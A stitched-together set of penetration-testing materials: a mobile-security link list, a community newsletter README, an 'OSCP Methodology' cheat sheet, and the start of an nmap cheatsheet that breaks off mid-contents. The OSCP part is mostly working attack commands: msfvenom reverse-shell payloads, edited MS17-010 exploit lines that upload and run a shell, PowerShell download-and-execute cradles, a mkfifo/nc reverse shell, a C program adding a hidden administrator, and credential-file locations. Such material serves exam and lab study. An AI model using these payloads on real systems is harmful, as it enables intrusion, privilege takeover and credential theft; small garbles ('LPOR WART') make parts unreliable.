System](https://github.com/quark-engine/quark-engine) * [Root Detection Bypass By Manual Code Manipulation.](https://medium.com/@sarang6489/root-detection-bypass-by-manual-code-manipulation-5478858f4ad1) * [Application and Network Usage in Android](https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1528491463.pdf) * [GEOST BOTNET - the discovery story of a new Android banking trojan](http://public.avast.com/research/VB2019-Garcia-etal.pdf) * [Mobile Pentesting With Frida](https://drive.google.com/file/d/1JccmMLi6YTnyRrp_rk6vzKrUX3oXK_Yw/view) * [Magisk Systemless Root - Detection and Remediation](https://www.mobileiron.com/en/blog/magisk-android-rooting) * [AndrODet: An adaptive Android obfuscation detector](https://arxiv.org/pdf/1910.06192.pdf) * [Hands On Mobile API Security](https://hackernoon.com/hands-on-mobile-api-security-get-rid-of-client-secrets-a79f111b6844) * [Zero to Hero - Mobile Application Testing - Android Platform](https://nileshsapariya.blogspot.com/2016/11/zero-to-hero-mobile-application-testing.html) * [How to use FRIDA to bruteforce Secure Startup with FDE-encryption on a Samsung G935F running Android 8](https://github.com/Magpol/fridafde) * [Android Malware Adventures](https://docs.google.com/presentation/d/1pYB522E71hXrp4m3fL3E3fnAaOIboJKqpbyE5gSsOes/edit) ### Labs * [DIVA (Damn insecure and vulnerable App)](https://github.com/payatu/diva-android) * [SecurityShepherd](https://github.com/OWASP/SecurityShepherd) * [Damn Vulnerable Hybrid Mobile App (DVHMA)](https://github.com/logicalhacking/DVHMA) * [OWASP-mstg](https://github.com/OWASP/owasp-mstg/tree/master/Crackmes) * [VulnerableAndroidAppOracle](https://github.com/dan7800/VulnerableAndroidAppOracle) * [Android InsecureBankv2](https://github.com/dineshshetty/Android-InsecureBankv2) * [Purposefully Insecure and Vulnerable Android Application (PIIVA)](https://github.com/htbridge/pivaa) * [Sieve app](https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk) * [DodoVulnerableBank](https://github.com/CSPF-Founder/DodoVulnerableBank) * [Digitalbank](https://github.com/CyberScions/Digitalbank) * [OWASP GoatDroid](https://github.com/jackMannino/OWASP-GoatDroid-Project) * [AppKnox Vulnerable Application](https://github.com/appknox/vulnerable-application) * [Vulnerable Android Application](https://github.com/Lance0312/VulnApp) * [MoshZuk](https://dl.dropboxusercontent.com/u/37776965/Work/MoshZuk.apk) * [Hackme Bank](http://www.mcafee.com/us/downloads/free-tools/hacme-bank-android.aspx) * [Android Security Labs](https://github.com/SecurityCompass/AndroidLabs) * [Android-InsecureBankv2](https://github.com/dineshshetty/Android-InsecureBankv2) * [Android-security](https://github.com/rafaeltoledo/android-security) * [VulnDroid](https://github.com/shahenshah99/VulnDroid) ### Misc. * [Android-Reports-and-Resources](https://github.com/B3nac/Android-Reports-and-Resources/blob/master/README.md) * [android-security-awesome](https://github.com/ashishb/android-security-awesome) * [Android Penetration Testing Courses](https://medium.com/mobile-penetration-testing/android-penetration-testing-courses-4effa36ac5ed) * [Lesser-known Tools for Android Application PenTesting](https://captmeelo.com/pentest/2019/12/30/lesser-known-tools-for-android-pentest.html) * [android-device-check - a set of scripts to check Android device security configuration](https://github.com/nelenkov/android-device-check) * [apk-mitm - a CLI application that prepares Android APK files for HTTPS inspection](https://github.com/shroudedcode/apk-mitm) * [Andriller - is software utility with a collection of forensic tools for smartphones](https://github.com/den4uk/andriller) * [Dexofuzzy: Android malware similarity clustering method using opcode sequence-Paper](https://www.virusbulletin.com/virusbulletin/2019/11/dexofuzzy-android-malware-similarity-clustering-method-using-opcode-sequence/) * [Chasing the Joker](https://docs.google.com/presentation/d/1sFGAERaNRuEORaH06MmZKeFRqpJo1ol1xFieUa1X_OA/edit#slide=id.p1) * [Side Channel Attacks in 4G and 5G Cellular Networks-Slides](https://i.blackhat.com/eu-19/Thursday/eu-19-Hussain-Side-Channel-Attacks-In-4G-And-5G-Cellular-Networks.pdf) * [Shodan.io-mobile-app for Android](https://github.com/PaulSec/Shodan.io-mobile-app) # iOS ### Blogs, Papers, How to's * [iOS Security](https://www.cse.wustl.edu/~jain/cse571-14/ftp/ios_security/index.html) * [Basic iOS Apps Security Testing lab](https://medium.com/@ehsahil/basic-ios-apps-security-testing-lab-1-2bf37c2a7d15) * [IOS Application security – Setting up a mobile pentesting platform](https://resources.infosecinstitute.com/ios-application-security-part-1-setting-up-a-mobile-pentesting-platform/#gref) * [Collection of the most common vulnerabilities found in iOS applications](https://github.com/felixgr/secure-ios-app-dev) * [IOS_Application_Security_Testing_Cheat_Sheet](https://www.owasp.org/index.php/IOS_Application_Security_Testing_Cheat_Sheet) * [OWASP iOS Basic Security Testing](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06b-basic-security-testing) * [Dynamic analysis of iOS apps w/o Jailbreak](https://medium.com/@ansjdnakjdnajkd/dynamic-analysis-of-ios-apps-wo-jailbreak-1481ab3020d8) * [iOS Application Injection](https://arjunbrar.com/post/ios-application-injection) * [Low-Hanging Apples: Hunting Credentials and Secrets in iOS Apps](https://spaceraccoon.dev/low-hanging-apples-hunting-credentials-and-secrets-in-ios-apps) * [Checkra1n Era - series](https://blog.digital-forensics.it/) * [BFU Extraction: Forensic Analysis of Locked and Disabled iPhones](https://blog.elcomsoft.com/2019/12/bfu-extraction-forensic-analysis-of-locked-and-disabled-iphones/) * [HowTo-decrypt-Signal.sqlite-for-IOS](https://github.com/Magpol/HowTo-decrypt-Signal.sqlite-for-IOS) * [Can I Jailbreak?](https://canijailbreak.com/) * [How to Extract Screen Time Passcodes and Voice Memos from iCloud](https://blog.elcomsoft.com/2019/10/how-to-extract-screen-time-passcodes-and-voice-memos-from-icloud/) * [Reverse Engineering Swift Apps](https://github.com/iOS-Reverse-Engineering-Dev/Swift-Apps-Reverse-Engineering/blob/master/Reverse%20Engineering%20Swift%20Applications.pdf) * [Mettle your iOS with FRIDA](https://sensepost.com/blog/2019/mettle-your-ios-with-frida/) * [A run-time approach for pentesting iOS applications](https://blog.securelayer7.net/a-run-time-approach-for-pen-testing-ios-applications-part-ii-objection-in-action/) * [iOS Internals vol 2](http://newosxbook.com/bonus/iBoot.pdf) * [Understanding usbmux and the iOS lockdown service](https://medium.com/@jon.gabilondo.angulo_7635/understanding-usbmux-and-the-ios-lockdown-service-7f2a1dfd07ae) * [A Deep Dive into iOS Code Signing](https://blog.umangis.me/a-deep-dive-into-ios-code-signing/) * [AirDoS: remotely render any nearby iPhone or iPad unusable](https://kishanbagaria.com/airdos/) * [How to access and traverse a #checkra1n jailbroken iPhone File system using SSH](https://aboutdfir.com/jailbreaking-checkra1n-configuration/) ### Labs * [OWASP iGoat](https://www.owasp.org/index.php/OWASP_iGoat_Tool_Project) * [Damn Vulnerable iOS App (DVIA) v2](https://github.com/prateek147/DVIA-v2) * [Damn Vulnerable iOS App (DVIA) v1](https://github.com/prateek147/DVIA) * [iPhoneLabs](https://github.com/SecurityCompass/iPhoneLabs) * [iOS-Attack-Defense](https://github.com/ManicodeSecurity/iOS-Attack-Defense) ### Misc. * [Most usable tools for iOS penetration testing](https://github.com/ansjdnakjdnajkd/iOS) * [iOS-Security-Guides](https://github.com/0xmachos/iOS-Security-Guides) * [osx-security-awesome - OSX and iOS related security tools](https://github.com/ashishb/osx-and-ios-security-awesome) * [Trust in Apple's Secret Garden: Exploring & Reversing Apple's Continuity Protocol-Slides](https://i.blackhat.com/eu-19/Thursday/eu-19-Yen-Trust-In-Apples-Secret-Garden-Exploring-Reversing-Apples-Continuity-Protocol-3.pdf) * [Apple Platform Security](https://manuals.info.apple.com/MANUALS/1000/MA1902/en_US/apple-platform-security-guide.pdf)
# WEEKLY INFOSEC UPDATE : v0.7 - An initiative by [ResetHacker Community](https://github.com/RESETHACKER-COMMUNITY/What-Is-RESETHACKER) ![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) ![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) ![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) ![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) Hey Hackers, Thankyou for visiting Weekly Infosec Update. ![WeeklyInfosecUpdate_v0.7](https://user-images.githubusercontent.com/25515871/192681278-0cfb1d6f-c1a4-4e62-85f1-21f41724a4a0.png) <details> <summary><b>Preview</b></summary> - 1. CVE : poc exploit and analysis. - CVE Week → Day0* — Day0* Month 2022 - Security Patched - CVE: analysis & poc - CVE poc - 2. Secuirty & Researchers: AppSec, Red team, Blue team, threat intelligence, Malware, Ransomware etc - Infosec Business, funded and Market - Web Security and android security - Cloud Security - Blue/Red/Threat Intelligence Team - 3. News - DataBreach & Black Hat Hacker - Top 5 in Infosec - Twitter threads & Tips. - Hiring & Jobs - Event Recap. - Conferences - Webinars and videos - Ongoing/Upcomming 𝙀𝙑𝙀𝙉𝙏𝙎: - 4. Bug Bounty : reports, Write-ups and Resources. - Hackerone/Bugcrowd REPORT - Bug bounty writeups, tips & resources - 5. Tools, framework, RAT, Ransomware and malware - SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting : * Tool - Cloud Security : * Tool - Blue/Red Team/Threat intelligence : * Tool - Reverse engineering & OSINT : * Tool - IOT, OS & Hardware : * Tool - 6. How to get involve in Contribution and contributors. - Community Engagement Partners. - Team/contributors of #WeeklyInfosecUpdate. - Resource for Weekly infosec Update. - 7. Wrapping Up. :) </details> --- # InfoSec community infused Weekly Update : ID | Weekly Issue Number | Recap Week | Issued Date | |---|---|---|---| | 11 | [Weekly Issue 12](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_11.md) | 19th October 2022 - 25th october 2022 | 26th October 2022 | | 10 | [Weekly Issue 11](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_10.md) | 12 October 2022 - 18 october 2022 | 19 October 2022 | | 09 | [Weekly Issue 10](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_09.md) | 28 Sept 2022 - 11 October 2022 | 12 October 2022 | | 09 | [Weekly Issue 09](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_08.md) | 21 Sept 2022 - 27 Sept 2022 | 28 Sept 2022 | | 08 | [Weekly Issue 08](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_07.md) | 14 Sept 2022 - 20 Sept 2022 | 21 Sept 2022 | | 07 | [Weekly Issue 07](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_06.md) | 07 Sept 2022 - 13 Sept 2022 | 14 Sept 2022 | | 06 | [Weekly Issue 06](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_05.md) | 31st August - 06 September 2022 | 07 September 2022 | | 05 | [Weekly Issue 05](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_04.md) | 23rd August - 30th August 2022 | 31st August 2022 | | 04 | [Weekly Issue 04](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_03.md) | 16th August - 22nd August 2022 | 23th August 2022 | | 03 | [Weekly Issue 03](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_02.md) | 9th August - 15th August 2022 | 16th August 2022 | | 02 | [Weekly Issue 02](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_01.md) | 2nd August - 8th August 2022 | 9th August 2022 | | 01 | [Weekly Issue 01](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_00.md) | 25th July - 01st August 2022 | 02 August 2022 | #### Give a STAR if you appricaitae our work or Weekly InfoSec Update provide value to you. ## In the future, 1. Weekly Infosec Update • Shifting to a website with freemium subscription model for #WeeklyInfosecUpdate. • Add more categories such as daily, Infosec Weekly, Developers Weekly and monthly Reccap. • Newsletter Service to Organization. 2. Create a public knowledge db • Make it a wiki • Crowdsorce the Content. <details> <summary><b>Preview</b></summary> Future plans detailed: 1. The final version of Weekly Infosec Update will be a website that will contain categorised content for Professional and beginners. it would be something like packetstorm, but only with useful information. There will be categories such as: • Daily infosec updates - may contain less important news, but on a daily basis • Weekly infosec updates - general weekly news • Monthly Infosec Updates - only the most important things that happened during a month • Breach news - big breaches • Critical news - news such as log4shell • New TTPs - new tactics techniques and procedures The list of categories may get bigger 2. Public knowledge DB - It would be something between mitre att&ck and an obsidian notebook. If you ever took notes while learning, you know what am i talking about. It will contain not only techniques like in mitre, but as well as POCs and explanation how it works + resources for more details. - The knowledge db will be a wiki, so anyone could contribute with their notes or blog posts. Every post will be categorised and chained like in obsidian notebook, so by reading a post, you will see many more posts related to the same subject. This way we will crowdsource our knowledge and help each other in our infosec journey 3. Offline Meeteups in City/country and support Cybersecurity project/event. 4. We're planning to start a Chapters for ResetHacker Community in different city and country so if you have expiriance with leading community, group and leaders do reach out to us at ([email protected]) and Capter name will be Eg : RH-County/City/Community/group/Team name. 5. Collebration with venue for Events. </details> #### Team/Volunteer Opportunities : <div align=""><br> <a href="mailto:[email protected]?subject=ResetHacker Community" target="_blank"><img src="https://img.shields.io/badge/Gmail-D14836?logo=gmail"></a> </div> If you want to get involved in making **Weekly Cybersecurity Update**, but aren't sure how ? CONTACT "@Attr1b" on Telegram or contact us through mail "[email protected]" <details> <summary><b>Preview</b></summary> - Wanna help our community to crowd source knowledge? - How can you contribute with us: - Help us gathering infosec news and update at the end of week. - Help us developing and/or maintaining both of our projects mentioned above. - Suggest something you would wanna see and how do you plan to improve. - We'll invite Volunteer to the Github as contributor so later you can add this project to your resume but if you think you can contribute otherwise or if you have some other idea that we can help you let me know as well. </details> #### 🤝🤝🤝 Researchers, community, groups and community engagement patners that Support Weekly Infosec Update 🤝🤝🤝 <details> <summary><b>Preview</b></summary> - Huge thanks to our awesome [Community Leader for contribution and giving back to community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md) and thankyou for being the part of team. - Contributors : Good Resources Share, Paul miller, Tarang Parmar, Tuhin Bose, Vikram and Alexandre ZANNI. - I'm very grateful to all the [Organization, group, and community that support us for the engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md). Without their support distributing "Weekly InfoSec Update" among hackers would not have been possible. - Resources from [Organization and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) that help us drafting [Weekly infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md). </details> #### Wrapping Up Have questions, Suggestions, or feedback? Just reply directly to mail, I'd love to hear from you. If you find this update useful and know other people who would too, I'd really appreciate if you'd forward it to them ?? Thanks for reading! <p align="center"> <img src="https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat" alt="RESETHACKER-COMMUNITY" /> </p>
# OSCP Methodology OSCP Methodology ## Blackbox Enumeration #### nmap full tcp port scan ##### nmap \<ip> -sV -sC -O -T4 --traceroute -p - -oA ~/path/filename #### Ftp * service -> exploit (searchsploit + google) * banner * default creds (hydra) * Anonymous login * Put files * if exists web service, check if web and ftp has the same path * nmap info #### SSH * service -> exploit (searchsploit + google) * banner * default creds (hydra) * default creds with nsr (hydra) * nmap info #### Samba * nmap info: * OS samba * Computer name/NetBIOS name * Domain name * Workgroup * OS of machine * service (OS samba or nmap service header (139 & 445)) -> exploit (searchsploit + google) ##### nmap -sV -sC --open -T4 -p 139,445 --script=vuln --script-args=unsafe=1 <ip> * enum4linux * smbclient *smbclient -L <ip> -N * connect to samba in a specific share with creds * smbclient \\\\ip\\share -U username #### MSSQL ###### sqsh * Connect to MSSQL: ###### sqsh -S \<ip> -U \<username> * Enable xp_cmdshell: ###### EXEC SP_CONFIGURE N'show advanced options', 1 ###### go Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install. (return status = 0) ###### RECONFIGURE ###### go ###### EXEC SP_CONFIGURE N'xp_cmdshell', 1 ###### go Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. (return status = 0) ###### RECONFIGURE ###### go ###### nmap ###### nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=\<pass>,ms-sql-xp-cmdshell.cmd="net user " \<ip> #### Http/Https * Service -> exploit (searchsploit + google) * nmap info * if directories from nmap output, OPTIONS request for put http method availability. * nikto: * default * CGI all * source * gobuster: * with common.txt: ###### gobuster dir -u [url] -w /usr/share/wordlists/dirb/common.txt -s '200,204,301,302,307,403,500' -e -t [number] -o common.results ###### gobuster dir -u [url] -w /usr/share/wordlists/dirb/common.txt -s '200,204,301,302,307,403,500' -e -t [number] -x .exte,.exte,.exte -o exte.common.results * With big.txt: ###### gobuster dir -u [url] -w /usr/share/wordlists/dirb/big.txt -s '200,204,301,302,307,403,500' -e -t [number] -o big.results ###### gobuster dir -u [url] -w /usr/share/wordlists/dirb/big.txt -s '200,204,301,302,307,403,500' -e -t [number] -x .exte,.exte,.exte -o exte.big.results * With medium.txt: ###### gobuster dir -u [url] -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,307,403,500' -e -t [number] -o medium.results ###### gobuster dir -u [url] -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,307,403,500' -e -t [number] -x .exte,.exte,.exte -o exte.medium.results * Play around with burpsuite (Spider, repeater) * if web page contains big articles qith many words use cewl: ##### cewl -w custom_worlist \<ip> -d \<depth> ## Exploits ### Windows #### Churrasco * Windows Server 2003 and IIS 6.0 privledge escalation using impersonation token (Tokens kiddnapping revenge): * use https://github.com/Re4son/Churrasco/raw/master/churrasco.exe * Needs Listener ### Windows #### MS08-067 git clone https://github.com/andyacer/ms08_067.git * configuration * pip install impacket * 2 reverse options for shellcoding: * Use the third with 443 * Use the third with default * Use second with default * Use second with port of third or another port * Choose the right option of menu. * Find OS of machine * Guess lanhuage * Needs Listener ### Windows #### MS17-010 git clone https://github.com/worawit/MS17-010.git ##### zzz_exploit.py: * If needed USERNAME-"//" * next add the following 2 lines to below def smb smb_send_file(smbConn, '/root/htb/blue/puckieshell443.exe', 'C', '/puckieshell443.exe') service_exec(conn, r'cmd /c c:\\puckieshell443.exe') * custom payload: ##### msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.28 LPORT=443 -f exe > shell.exe * Needs Listener ##### eternalblue_exploit7.py * use the https://github.com/nickvourd/eternalblue_win7_auto_gen in order to merge binaries nad payload * Run the following: python MS17-010/eternalblue_exploit7.py <ip> /tmp/sc_x<arch>.bin * Needs Listener ### Windows #### MS10-059 * use the https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059 * serve the MS10-059.exe (https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS10-059/MS10-059.exe) to victim * run exploit: ##### MS10-059.exe \<ip> \<port> * Need Listener ### Windows #### MS11-046 * use the https://www.exploit-db.com/exploits/40564 * compile: ##### i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32 ###### Installation: apt install mingw-w64 * no need listener (insta run) ### Windows #### MS15-051 * use the https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip * Check the architecture of victim and choose the right exe * upload to victim machine * run the following: ###### ms15-051x64.exe "nc.exe 10.10.14.28 4444 -e cmd.exe" * Needs Listener ### Windows #### MS16-032 * use https://www.exploit-db.com/exploits/39719 * Edit the file: * end of file add this Invoke-MS16-032 * Inside th file search and find cmd.exe two times. * Change with shell.exe in current directory in victim which you are. * generate shell.exe: ###### msfvenom -p windows/shell_reverse_tcp LHOST=\<ip> LPORT=6666 -f exe > shell.exe * serve the shell.exe to victim * open a listener * run the ps1 exploit: ##### C:\windows\sysnative\windowspowershell\v1.0\powershell IEX(New-Object Net.WebClient).downloadString('http://\<ip>/ms16032.ps1') ## Potatos ### Hot Potato What is: Hot Potato (aka: Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing. Affected systems: Windows 7,8,10, Server 2008, Server 2012 Guide: https://foxglovesecurity.com/2016/01/16/hot-potato/ Use: https://github.com/foxglovesec/Potato ### Rotten Potato What is: Rotten Potato and its standalone variants leverages the privilege escalation chain based on BITS service having the MiTM listener on 127.0.0.1:6666 and when you have SeImpersonate or SeAssignPrimaryToken privileges Affetced sytsems: Windows 7,8,10, Server 2008, Server 2012, Server 2016 Guide: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ https://0xdf.gitlab.io/2018/08/04/htb-silo.html Use: https://github.com/nickvourd/lonelypotato * Rotten Potato from default opens meterpreter, use lonely potato which opens in line shell ### Juicy Potato What is: Juicy potato is basically a weaponized version of the RottenPotato exploit that exploits the way Microsoft handles tokens. Through this, we achieve privilege escalation. Affetcted Systems: * Windows 7 Enterprise * Windows 8.1 Enterprise * Windows 10 Enterprise * Windows 10 Professional * Windows Server 2008 R2 Enterprise * Windows Server 2012 Datacenter * Windows Server 2016 Standard Find CLSID here: https://ohpe.it/juicy-potato/CLSID/ ##### Warning: Juicy Potato doesn’t work in Windows Server 2019 Guides: https://0x1.gitlab.io/exploit/Windows-Privilege-Escalation/#juicy-potato-abusing-the-golden-privileges https://hunter2.gitbook.io/darthsidious/privilege-escalation/juicy-potato#:~:text=Juicy%20potato%20is%20basically%20a,this%2C%20we%20achieve%20privilege%20escalation. Use: https://github.com/ohpe/juicy-potato ## Privilege Escalation ### Windows * systeminfo | findstr /B /C:"OS Name" /C:"OS Version" * searchsploit * google * systeminfo * Architecture * Numbers of Proccessors * Domain * HotFixes * System Locale * Input Locale * Numbers of cores of processors: ##### WMIC CPU Get DeviceID,NumberOfCores,NumberOfLogicalProcessors * Windows Privileges: ##### whoami /priv * More info here: https://hackinparis.com/data/slides/2019/talks/HIP2019-Andrea_Pierini-Whoami_Priv_Show_Me_Your_Privileges_And_I_Will_Lead_You_To_System.pdf * SeDebugPrivilege * SeRestorePrivilege * SeBackupPrivilege * SeTakeOwnershipPrivilege * SeTcbPrivilege * SeCreateToken Privilege * SeLoadDriver Privilege * SeImpersonate & SeAssignPrimaryToken Priv. * Users of system and their groups * net user * net user <user> *Password required *groups * whoami /groups * Insecure File Permissions: ##### tasklist /SVC > process.txt or with powershell ##### Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} ##### icacls "\<path>\\<file.exe>" * if full access the User can modify it. Custom exploit: #include <stdlib.h> int main (){ int i; i = system ("net user evil Ev!lpass /add"); i = system ("net localgroup administrators evil /add"); retunr 0; } Compile from windows: i686-w64-mingw32-gcc adduser.c -o adduser.exe move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe" move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe" dir "C:\Program Files\Serviio\bin\" net stop Servilo if access denied try:wmic service where caption="Serviio" get name, caption, state, startmode -> if Auto atrribute inside then will auto execute after reboot. whoami /priv if SeShutdownPrivilege then we can restart machine: * shutdown /r /t 0 net localgroup Administrators * Unqoted Service Path: * Enumerating World Writable Directories: ##### accesschk.exe -uws "Everyone" "C:\Program Files" * Applications installed versions: ###### wmic product get name, version, vendor * Schedule tasks ##### schtasks /query /fo LIST /v > schedule.txt * Windows-Exploit-Suggester * python windows-exploit-suggester.py --database 2020-08-09-mssb.xls --systeminfo grandpa.txt * Serlock * Config: Add to the last line the "Find-AllVulns" * Download and run Sherlock: ##### echo IEX(New-Object Net.WebClient).DownloadString('http://\<ip>:\<port>/Sherlock.ps1') | powershell -noprofile - * Watson * Find .NET latest version of victim: ##### dir %windir%\Microsoft.NET\Framework /AD * Fow older than windows 10 download zip version of watson v.1: https://github.com/rasta-mouse/Watson/tree/486ff207270e4f4cadc94ddebfce1121ae7b5437 * Build exe to visual studio * PowerUP * Config: add to the last line the "Invoke-AllChecks" * Download and run PowerUp: ##### echo IEX(New-Object Net.WebClient).DownloadString('http://\<ip>:\<port>/PowerUp.ps1') | powershell -noprofi * Stored Creadentials: * cmdkey /list * if interactive module enabled 100% runas as other user * if domain and user exist try again runas as other user ##### runas /savecred /user:\<Domain>\\\<user> C:\\\<path>\\\<exefile> * Stored as plaintext or base64 * C:\unattend.xml * C:\Windows\Panther\Unattend.xml * C:\Windows\Panther\Unattend\Unattend.xml * C:\Windows\system32\sysprep.inf * C:\Windows\system32\sysprep\sysprep.xml * If system is running an IIS web server the web.config file: * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config * C:\inetpub\wwwroot\web.config * Local administrators passwords can also retrieved via the Group Policy Preferences: * C:\ProgramData\Microsoft\Group Policy\History\????\Machine\Preferences\Groups\Groups.xml * \\????\SYSVOL\\Policies\????\MACHINE\Preferences\Groups\Groups.xml * Except of the Group.xml file the cpassword attribute can be found in other policy preference files as well such as: * Services\Services.xml * ScheduledTasks\ScheduledTasks.xml * Printers\Printers.xml * Drives\Drives.xml * DataSources\DataSources.xml * Most Windows systems they are running McAfee as their endpoint protection. The password is stored encrypted in the SiteList.xml file: * %AllUsersProfile%Application Data\McAfee\Common Framework\SiteList.xml ## MSFVENOM ### EXE ##### msfvenom -p windows/shell_reverse_tcp LHOST=\<ip> LPORT=\<port> -f exe > shell.exe ### JSP ##### msfvenom -p java/jsp_shell_reverse_tcp LHOST=\<ip> LPORT=\<port> -f raw > shell.jsp ### ASP ##### msfvenom -p windows/shell_reverse_tcp LHOST=\<ip> LPORT=\<port> -f asp > shell.asp ### ASPX ##### msfvenom -p windows/shell_reverse_tcp LHOST=\<ip> LPOR WART=\<port> -f aspx > shell.aspx ### WAR ##### msfvenom -p java/jsp_shell_reverse_tcp LHOST=\<ip> LPORT=\<port> -f war > shell.war ## Download files ### With Powershell powershell -command "& { iwr http://192.168.199.1/win.txt -OutFile win.txt }" ## Reverse shell with nc rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f plink → What is plink: Plink is a command-line connection tool similar to UNIX ssh. It is mostly used for automated operations, such as making CVS access a repository on a remote server. Plink is a command line application.It makes simple interactive connection to a remote server. This means that you cannot just double-click on its icon to run it and instead you have to bring up a console window. Example to expose ports: 445 (samba) How to expose a port on your local machine: [local_machine]: systemctl start ssh → Upload plink.exe on remote machine as binary (mode) [remote_machine]: plink.exe -l [username] -pw [password] -R [port]:127.0.0.1:[port] [ip] → After that, the victim’s port will be exposed on your local machine (127.0.0.1)
# nmap ![](assets/16523510240258.png) [Official Website](https://nmap.org) # Table of Contents - [nmap](#nmap) - [Table of Contents](#table-of-contents) - [Installation](#installation) - [Cheatsheet](#cheatsheet) - [Use](#use) - [Scan IP address (Targets)](#scan-ip-address-targets) - [Scan a single host IP](#scan-a-single-host-ip) - [Scan a Class C subnet range](#scan-a-class-c-subnet-range) - [Scan the range of IPs between 10.1.1.5 up to 10.1.1.100](#scan-the-range-of-ips-between-10-1-1-5-up-to-10-1-1-100) - [Scan the IP addresses listed in text file “hosts.txt”](#scan-the-ip-addresses-listed-in-text-file“-hosts-txt”) - [Scan the 3 specified IPs only](#scan-the-3-specified-ips-only) - [Port Related Commands](#port-related-commands) - [Scan only port 80 for specified host](#scan-only-port-80-for-specified-host) - [Scan ports 20 up to 23 for specified host](#scan-ports-20-up-to-23-for-specified-host) - [Scan ports 80,88,8000 only](#scan-ports-80-88-8000-only) - [Scan ALL ports for specified host](#scan-all-ports-for-specified-host) - [Scan ports UDP 53 and TCP 22](#scan-ports-udp-53-and-tcp-22) - [Scan http and ssh ports for specified host](#scan-http-and-ssh-ports-for-specified-host) - [Different Scan Types](#different-scan-types) - [TCP SYN Scan (best option)](#tcp-syn-scan-best-option) - [Full TCP connect scan](#full-tcp-connect-scan) - [Scan UDP ports](#scan-udp-ports) - [Do a Ping scan only](#do-a-ping-scan-only) - [Don’t ping the hosts, assume they are up.](#don’t-ping-the-hosts-assume-they-are-up) - [Identify Versions of Services and Operating Systems](#identify-versions-of-services-and-operating-systems) - [Version detection scan of open ports (services)](#version-detection-scan-of-open-ports-services) - [Identify Operating System version](#identify-operating-system-version) - [This combines OS detection, service version detection, script scanning and traceroute.](#this-combines-os-detection-service-version-detection-script-scanning-and-traceroute) - [Scan Timings](#scan-timings) - [Slowest scan (to avoid IDS)](#slowest-scan-to-avoid-ids) - [Sneaky (to avoid IDS)](#sneaky-to-avoid-ids) - [Polite (10 times slower than T3)](#polite-10-times-slower-than-t3) - [Default scan timer (normal)](#default-scan-timer-normal) - [Aggressive (fast and fairly 